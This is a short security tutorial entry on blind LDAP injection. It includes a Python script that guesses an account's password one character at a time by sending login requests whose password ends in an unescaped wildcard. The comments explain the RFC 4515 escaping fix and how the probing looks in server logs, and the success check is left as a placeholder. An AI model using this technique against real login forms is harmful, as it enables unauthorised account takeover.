LDAP Injection
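Example of retrieving a password using blind LDAP injection from a login form. It works only when the application copies the submitted password into an LDAP search filter without escaping it, so that a trailing `*` is evaluated as a wildcard; escaping filter metacharacters (RFC 4515) before the filter is built removes the oracle: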
#!/usr/bin/python3
import requests
import string
import re
# Candidate alphabet tried at each position: "{", "}", "_", "-", then ASCII
# letters and digits.
charset = "".join(("{}_-", string.ascii_letters, string.digits))
# Placeholder for the base URL of the application under test.
url = "<url>"
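def go(p):
    """Submit one login attempt whose password is the prefix ``p`` plus ``*``.

    The trailing ``*`` only has an effect if the server places the submitted
    password into an LDAP search filter without escaping it; a filter built
    with RFC 4515 escaping treats it as a literal character and every probe
    fails. Each call is one POST to ``/login`` for the same username, so on
    the server side a run of these shows up as repeated login attempts
    against a single account.

    Args:
        p: Password prefix to test.

    Returns:
        bool: Placeholder, always ``False``. The success/failure decision
        based on the response ``r`` is left to be filled in.
    """
    d = {"username": "<username>", "password": f"{p}*"}
    r = requests.post(url + '/login', allow_redirects=False, data=d)
    # return true on success, false on error depending on the response
    # Fixed: the original returned the undefined name `false` (NameError).
    return False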
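# `pass` is a reserved word in Python and cannot be used as a variable name
# (the original was a SyntaxError), so the recovered prefix lives in
# `recovered`.
recovered = ""
while True:
    # Up to len(charset) login requests are issued per position, all for the
    # same username; rate limiting or account lockout on failed logins bounds
    # how far this loop can get.
    for c in charset:
        if go(recovered + c):
            recovered += c
            print(recovered)
            # Restart from the beginning of the charset for the next position.
            break
    else:
        # No candidate extended the prefix: stop instead of looping forever.
        break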